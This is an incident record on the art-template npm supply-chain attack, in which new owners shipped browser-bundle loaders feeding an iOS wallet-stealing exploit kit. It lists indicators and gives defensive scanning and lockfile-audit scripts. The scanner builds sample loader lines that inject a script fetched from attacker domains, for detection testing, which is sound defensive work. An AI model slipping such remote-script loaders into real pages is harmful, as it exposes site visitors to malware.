Open Source · 2024-11-17 · 549 days · Cryptocurrency Theft, Wallet Key Theft, Remote Code Execution

art-template sold to a shell company, then shipped the Coruna iOS exploit kit

The author sold art-template on 2024-11-17 to KILLER WHAL AI SDN BHD. The new owners shipped malicious loaders in the browser bundle of 4.13.3 (2025-03), then 4.13.5 and 4.13.6 (2026-05); the 2026 releases fed the Coruna iOS exploit kit through utaq.cfww.shop to steal cryptocurrency wallets from Safari on iOS 13.0-17.2.1.

Story

On May 19, 2026, Socket published an account of an unusual npm supply-chain attack: the malicious code in three releases of the JavaScript template engine art-template had been shipped not by an account takeover but by the package's lawful new owner, eighteen months after a quiet sale to a Malaysian shell company. The kit at the end of the chain was Coruna, a well-documented iOS exploit framework, and the buyer's paperwork had been convincing enough to survive months of due diligence by the original maintainer.

art-template is a Chinese-origin JavaScript template engine, about 26,000 weekly npm downloads. The last clean release was 4.13.2 on 2018-11-13. On 2024-11-17 the original maintainer, GitHub user aui (糖饼), accepted an acquisition offer from KILLER WHAL AI SDN BHD, a Malaysian company at 35A Jalan SG3/1, Taman Sri Gombak, registration 202001036306. The pitch was cash plus continued maintenance. The author ran due diligence — SSM, law firm, contract, payment — and transferred npm and GitHub. aui was renamed to goofychris. The npm publisher list for art-template, express-art-template, art-template-loader, and koa-art-template moved to daughtrymom, npmpacketmaintainmember7 at npmpacketmaintainmember7@proton.me, and v4v5qc at eb8org@gmail.com. The receiving bank account was later flagged by Chinese law enforcement and bank risk controls; the buyer cooperated for months on paperwork until the freezes cleared, which kept the transfer plausible.

The first injection followed on 2025-03-12 in 4.13.3, published by v4v5qc. Node's require('art-template') broke in the same release, because the new owners had removed the CommonJS compatibility. The injection lived only in the browser bundle lib/template-web.js: a String.fromCharCode-obfuscated loader that fetched https://git.youzzjizz.com/git.js, which in turn loaded Baidu Analytics from hm.baidu.com/hm.js?1351a72534dcecfcf4500eda9c5add00. The original author posted a GitHub Issues warning, "v4.13.3 contains a virus," and reported the package to npm. npm did not act. On 2025-03-14, the day after the warning, goofychris published 4.13.4 with the injection removed and opened issue 661 on goofychris/art-template: "We made some mistakes in the update two days ago… we wanted to make simple statistics. If this violates any rules, we have cleaned it up." The new maintainers then deleted both the warning thread and their own explanation.

The npm reports went unanswered. The second wave shipped on 2026-05-19 (4.13.5) and 2026-05-20 (4.13.6). The injection again lived in lib/template-web.js; the Node entry point was untouched. 4.13.5 wrapped the loader in String.fromCharCode; 4.13.6 inlined the same call in plaintext. The loader fetched v3.jiathis.com/code/jia.js from a compromised Chinese social-sharing CDN, pinged Baidu Analytics, and gated on the User-Agent string for iPhone. For iPhone it injected a zero-pixel iframe behind a closed Shadow DOM pointing at utaq.cfww.shop/gooll/gooll.html on 180.178.50.158 (AS45753, Hong Kong). The iframe served a 50 KB fingerprinting loader that classified the device, beaconed every ten seconds to l1ewsu3yjkqeroy.xyz/api/ip-sync/sync behind Cloudflare, and named each follow-on module by the first 40 hex characters of SHA256(sessionKey + moduleHash), with session key cecd08aa6ff548c2.
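Both waves hid the loader URL in the browser bundle the same way, so one check covers the 2025 and 2026 injections: decode every String.fromCharCode(...) call in lib/template-web.js (or in a built bundle that includes it) and match the result, together with the raw text, against the domains listed in this record. The script below is an added example written for this page; it is not code from art-template, Socket or SafeDep. The sample bundles it scans are constructed here (a harmless prefix plus a loader line encoding a domain from this record) and are not the real injected code.

```javascript
// Added example: decode String.fromCharCode-obfuscated strings in a browser
// bundle and match the result against the IOC domains from this record.
// Not code from art-template or from the published analyses.
const IOC_DOMAINS = [
  'v3.jiathis.com',
  'git.youzzjizz.com',
  'utaq.cfww.shop',
  'l1ewsu3yjkqeroy.xyz',
];

// Matches String.fromCharCode(104,116,...) and String["fromCharCode"](...).
const FROM_CHAR_CODE =
  /String(?:\.fromCharCode|\[["']fromCharCode["']\])\(\s*([\d\s,]+)\)/g;

// Replace each fromCharCode call with the string literal it would build,
// so the decoded bundle can be grepped like plaintext.
function decodeFromCharCode(src) {
  return src.replace(FROM_CHAR_CODE, (_, codes) => {
    const chars = codes
      .split(',')
      .map((n) => n.trim())
      .filter(Boolean)
      .map((n) => String.fromCharCode(Number(n)));
    return JSON.stringify(chars.join(''));
  });
}

// Scan a bundle. Reports each IOC domain found and whether it was visible
// in plaintext (as in 4.13.6) or only after decoding (as in 4.13.3/4.13.5).
function scanBundle(src, iocDomains = IOC_DOMAINS) {
  const decoded = decodeFromCharCode(src);
  const hits = [];
  for (const domain of iocDomains) {
    const inPlain = src.includes(domain);
    const inDecoded = decoded.includes(domain);
    if (inPlain || inDecoded) {
      hits.push({ domain, form: inPlain ? 'plaintext' : 'fromCharCode' });
    }
  }
  return { malicious: hits.length > 0, hits };
}

// Constructed sample inputs (not the real injected code): a harmless bundle
// prefix, a loader URL hidden behind String.fromCharCode, and the same kind
// of loader with the URL inlined.
function obfuscate(s) {
  return 'String.fromCharCode(' +
    [...s].map((c) => c.charCodeAt(0)).join(',') + ')';
}
const CLEAN = '!function(e){var t=e.template={};t.render=function(){}}(this);';
const SAMPLE_OBFUSCATED = CLEAN +
  'var s=document.createElement("script");s.src=' +
  obfuscate('https://git.youzzjizz.com/git.js') + ';';
const SAMPLE_PLAIN = CLEAN +
  'var s=document.createElement("script");' +
  's.src="https://v3.jiathis.com/code/jia.js";';

// Stand-alone run: scan the constructed samples, or a file given on argv.
if (typeof require !== 'undefined' && require.main === module) {
  const fs = require('fs');
  const inputs = process.argv[2]
    ? [[process.argv[2], fs.readFileSync(process.argv[2], 'utf8')]]
    : [['clean', CLEAN], ['obfuscated', SAMPLE_OBFUSCATED], ['plain', SAMPLE_PLAIN]];
  for (const [name, src] of inputs) {
    console.log(name, JSON.stringify(scanBundle(src)));
  }
}
```

Run it against node_modules/art-template/lib/template-web.js and against any built asset that bundles it; a clean 4.13.2 bundle produces no hits. Matching on domains rather than on the exact obfuscated byte sequence is deliberate: 4.13.5 and 4.13.6 differed only in whether the call was wrapped, and a hash of the loader would have missed one of them.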

The final stage was the Coruna iOS exploit kit. Fourteen remote modules, about 606 KB. Twenty-three Safari and WebKit vulnerabilities chained together. The kit stopped at iOS 17.3, matching the CVE-2024-23222 patch for the cassowary JavaScriptCore type-confusion bug. It dispatched between ARM64 and ARM64_32 builds and ran a WebAssembly proof-of-work to confirm a real JavaScriptCore JIT rather than a sandbox. The terminal payload was a 31 KB native ARM64 shellcode dropper for the PLASMAGRID cryptocurrency-wallet implant. Anything outside Safari on iOS 13.0 to 17.2.1 got only the Baidu tracker. Socket attributed the deployment to UNC6691 based on Coruna fingerprints previously documented by Google TAG, the JiaThis hijack, the bulk-registered .shop pattern, the Baidu integration, and the Hong Kong AS45753 infrastructure; SafeDep reached the same attribution independently.

Socket and SafeDep both advised downstream operators to pin art-template and its siblings to 4.13.2 and to audit caches and bundles for v3.jiathis.com, git.youzzjizz.com, utaq.cfww.shop, and l1ewsu3yjkqeroy.xyz. The harder problem sits upstream of the package manager. A clean legal acquisition leaves none of the forensic seams that an account takeover does, and there is no registry-side signal that distinguishes a maintainer who sold the project from one whose credentials were stolen.
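The pinning advice above is straightforward to mechanise for the lockfile side: walk package-lock.json, flag every installed copy of art-template newer than 4.13.2 (including transitive copies nested under other dependencies), list the sibling packages for manual review, and emit the npm "overrides" block that forces the clean version. The script below is an added example for this page, not Socket's, SafeDep's or the project's tooling. The sample lockfile and its version numbers for packages other than art-template are constructed for the demonstration; the record gives no per-version data for the siblings, so they are only flagged, not pinned.

```javascript
// Added example: audit a package-lock.json for art-template and its siblings
// after the ownership transfer, and generate an npm "overrides" pin.
// Not code from the project or from the published analyses.
const WATCHED = ['art-template', 'express-art-template', 'art-template-loader', 'koa-art-template'];
const LAST_CLEAN = '4.13.2';                                // last release by the original maintainer
const KNOWN_MALICIOUS = new Set(['4.13.3', '4.13.5', '4.13.6']); // art-template releases with injections

// Numeric dotted-version compare: -1, 0 or 1. Enough for art-template's x.y.z tags.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Every installed copy of a watched package, for lockfileVersion 1, 2 and 3.
function findWatched(lock) {
  const found = [];
  const record = (name, version, path) => {
    if (!WATCHED.includes(name)) return;
    // A second "node_modules/" segment means the copy is a transitive install.
    const transitive = path.split('node_modules/').length > 2;
    found.push({ name, version, path, transitive });
  };
  if (lock.packages) {                                      // v2 / v3: flat map keyed by path
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (!path) continue;                                  // "" is the root project
      record(meta.name || path.split('node_modules/').pop(), meta.version, path);
    }
  } else if (lock.dependencies) {                           // v1: nested tree
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps)) {
        const path = prefix + 'node_modules/' + name;
        record(name, meta.version, path);
        if (meta.dependencies) walk(meta.dependencies, path + '/');
      }
    };
    walk(lock.dependencies, '');
  }
  return found;
}

// Verdict per copy: 'malicious' for a known injected release, 'post-transfer'
// for anything else newer than 4.13.2 (e.g. 4.13.4), 'clean' at or below it,
// and 'review' for siblings, which saw the same publisher turnover.
function audit(lock) {
  return findWatched(lock).map((pkg) => {
    if (pkg.name !== 'art-template') return { ...pkg, verdict: 'review' };
    if (KNOWN_MALICIOUS.has(pkg.version)) return { ...pkg, verdict: 'malicious' };
    const c = compareVersions(pkg.version, LAST_CLEAN);
    return { ...pkg, verdict: c > 0 ? 'post-transfer' : 'clean' };
  });
}

// npm "overrides" fragment for package.json: pin art-template wherever a
// non-clean copy was found. Siblings get no pin here (no clean version known).
function overridesFor(findings) {
  const overrides = {};
  for (const f of findings) {
    if (f.name === 'art-template' && f.verdict !== 'clean') overrides['art-template'] = LAST_CLEAN;
  }
  return overrides;
}

// Constructed sample lockfile (versions other than art-template's are made up).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-app', version: '1.0.0' },
    'node_modules/art-template': { version: '4.13.6' },
    'node_modules/express-art-template': { version: '1.0.0' },
    'node_modules/some-ui-kit': { version: '2.3.0' },
    'node_modules/some-ui-kit/node_modules/art-template': { version: '4.13.2' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const fs = require('fs');
  const lock = process.argv[2] ? JSON.parse(fs.readFileSync(process.argv[2], 'utf8')) : SAMPLE_LOCK;
  const findings = audit(lock);
  for (const f of findings) console.log(f.verdict.padEnd(13), f.version.padEnd(8), f.path);
  console.log('overrides:', JSON.stringify({ overrides: overridesFor(findings) }));
}
```

Usage: node audit-lock.js package-lock.json, then paste the printed "overrides" object into package.json and run npm install so the lockfile is regenerated against 4.13.2. The "post-transfer" verdict exists so that 4.13.4, which carries no injection, is still pinned back: the page's point is that the publisher, not the individual tarball, is what changed.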

Affected Artifacts

Incident Context

Motive: Cryptocurrency Theft
Attribution: Group
Cause: Maintainer Ownership Transfer
Transitive: Yes
Actor: UNC6691

Indicators

  • location (distribution): npmjs.com/package/art-template
  • location (mirror): github.com/aui/art-template
  • file: lib/template-web.js
  • file_sha256 (loader 49554fde7424c31c.js): f31bdd069fe7966ae11be1f78ee5dd44445938856dd1df12379e0e84a6851f5c
  • file_sha1 (loader 49554fde7424c31c.js): 8064d4e0322f069b3dba13e7957ff0ca7dab7984
  • file_md5 (loader 49554fde7424c31c.js): 6e79ae622b7ef30f31fdbcc2dc65339e
  • domain: v3.jiathis.com
  • domain: git.youzzjizz.com
  • domain: utaq.cfww.shop
  • domain: l1ewsu3yjkqeroy.xyz
  • domain: hm.baidu.com
  • url: https://utaq.cfww.shop/gooll/gooll.html
  • url: https://l1ewsu3yjkqeroy.xyz/api/ip-sync/sync
  • ipv4: 180.178.50.158
  • ipv4: 172.67.141.14
  • ipv4: 104.21.40.254
  • cve: CVE-2024-23222
  • account: daughtrymom (npm)
  • account: npmpacketmaintainmember7 (npm)
  • account: v4v5qc (npm)
  • account: goofychris (GitHub, renamed from aui)
  • organization: KILLER WHAL AI SDN BHD (Malaysia, registration 202001036306)
  • campaign_code: CHMK6IG08F42496C22
  • session_key: cecd08aa6ff548c2

Notes

  • Ownership of the GitHub repo and npm publisher list was transferred by the original maintainer on 2024-11-17 to KILLER WHAL AI SDN BHD under contract, after the maintainer ran SSM and law-firm due diligence. This is a deliberate transfer, not an account takeover; the seller documented the buyer's chain in https://github.com/aui/blog/issues/3.
  • The 2025-03-12 4.13.3 injection used a different loader chain — git.youzzjizz.com front-loading Baidu Analytics via hm.baidu.com/hm.js?1351a72534dcecfcf4500eda9c5add00. The 2026-05 wave moved to v3.jiathis.com and the Coruna kit at utaq.cfww.shop.
  • 4.13.4 (2025-03-14) was published from the new owners' account but contains no injection — released the day after the original maintainer's public warning, with a "we made some mistakes" explanation on goofychris/art-template issue 661 that the new maintainers later deleted along with the warning thread.
  • 4.13.3 (2025-03-12), 4.13.5 (2026-05-19), and 4.13.6 (2026-05-20) are the malicious releases. 4.13.2 (2018-11-13) is the last release shipped by the original aui maintainer.
  • Injection lives in the browser bundle (lib/template-web.js) only; Node consumers using the CommonJS entry point are unaffected. Anything pulling the browser bundle via <script> tag or client-side bundler ships the loader into every page.
  • Coruna kit gates on Safari/WebKit and iOS 13.0-17.2.1; iOS 17.3 and later, Chrome, Firefox, Edge, and Android receive only the Baidu Analytics tracker. Final payload is the PLASMAGRID cryptocurrency-wallet implant.
  • UNC6691 attribution is Socket's, based on Coruna kit fingerprints documented by Google TAG. SafeDep notes the same actor and kit independently.
  • Sibling packages express-art-template, art-template-loader, and koa-art-template saw the same npm publisher turnover and should be treated as potentially affected; public reporting focused on art-template itself.

External References

Source record: oss/attacks/art-template-npm/meta.yaml